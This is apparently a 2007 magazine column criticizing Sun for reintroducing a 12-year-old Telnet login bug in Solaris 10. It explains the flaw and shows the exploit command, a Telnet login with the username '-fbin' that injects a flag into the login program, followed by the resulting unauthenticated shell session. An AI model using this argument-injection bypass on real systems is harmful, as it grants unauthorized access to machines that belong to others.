Hello,

We noticed you're browsing in private or incognito mode.

To continue reading this article, please exit incognito mode or log in.

Not an Insider? Subscribe now for unlimited access to online articles.

Simson Garfinkel

A View from Simson Garfinkel

The Old Bugs Are the Best Bugs

Sun reintroduces a 12-year-old security bug into Solaris.

  • February 12, 2007

Over the weekend, David Maynor posted a note in his blog that claimed that the so-called Telnet server in the Sun Solaris 10/11 operating system doesn’t “require any skill, any exploit knowledge, and can be scripted for mass attacks.”

Telnet is a program from the 1970s that allows people to remotely log in to a computer. It’s generally disabled because user names and passwords are sent without using encryption (which was illegal to export from the United States back then). But while the program has been largely abandoned, Sun still ships its Solaris 10 operating systems with both the Telnet server and client programs.

In any event, the Telnet server takes the user name that is provided by the person trying to log in and provides this information to what’s known as the log-in program. It’s the job of the log-in program to ask for the user’s user name and password. Normally it does this, and if the password is correct, the user is allowed to log in.

What Maynor discovered is that an attacker can try to log in with a user name like “-fbin.” The “-fbin” is passed along to the log-in program, which misinterprets the “-f” as a command from the operating system to log the user in to the specified account without asking for a password. So the exploit looks like this:

% telnet -l “-fbin” 192.168.1.110
Trying 192.168.1.110…
Connected to 192.168.1.110.
Escape character is ‘^]’.
Last login: Sun Feb 11 02:02:23 from 192.168.1.102
sun Microsystems Inc.     SunOS 5.10     Generic January 2005
$ id
uid=2(bin) gid=2(bin)

(You can read all the gory details here)

What’s truly amazing is that this vulnerability was first publicly reported by the Computer Emergency Response Team back in 1996. Apparently the bug was reintroduced by some programmer unfamiliar with the history. I’m told that it has since been fixed in Solaris 11.

So what’s wrong here? Many things.

  1. When the engineers at Sun fixed this in Solaris 11, they also should have fixed it in Solaris 10.
  2. At this point, Sun shouldn’t even be shipping a Telnet server.
  3. And if they are going to ship a server, they really should be validating it. Although I have no way of knowing what happened at Sun, my guess is that they didn’t bother to test the server because it is disabled by default.

In speaking with a security consultant at the RSA Security Trade Show last week, I was told that security bugs fixed in production servers on banking systems are frequently reintroduced when new releases are shipped. This is good news for security consultants, of course. But it also explains why organized crime is having such an easy time making money fast on the Internet.

AI is here.
Own what happens next at EmTech Digital 2019.

Register now
Want more award-winning journalism? Subscribe to Insider Plus.
  • Insider Plus {! insider.prices.plus !}*

    {! insider.display.menuOptionsLabel !}

    Everything included in Insider Basic, plus the digital magazine, extensive archive, ad-free web experience, and discounts to partner offerings and MIT Technology Review events.

    See details+

    Print + Digital Magazine (6 bi-monthly issues)

    Unlimited online access including all articles, multimedia, and more

    The Download newsletter with top tech stories delivered daily to your inbox

    Technology Review PDF magazine archive, including articles, images, and covers dating back to 1899

    10% Discount to MIT Technology Review events and MIT Press

    Ad-free website experience

/3
You've read of three free articles this month. for unlimited online access. You've read of three free articles this month. for unlimited online access. This is your last free article this month. for unlimited online access. You've read all your free articles this month. for unlimited online access. You've read of three free articles this month. for more, or for unlimited online access. for two more free articles, or for unlimited online access.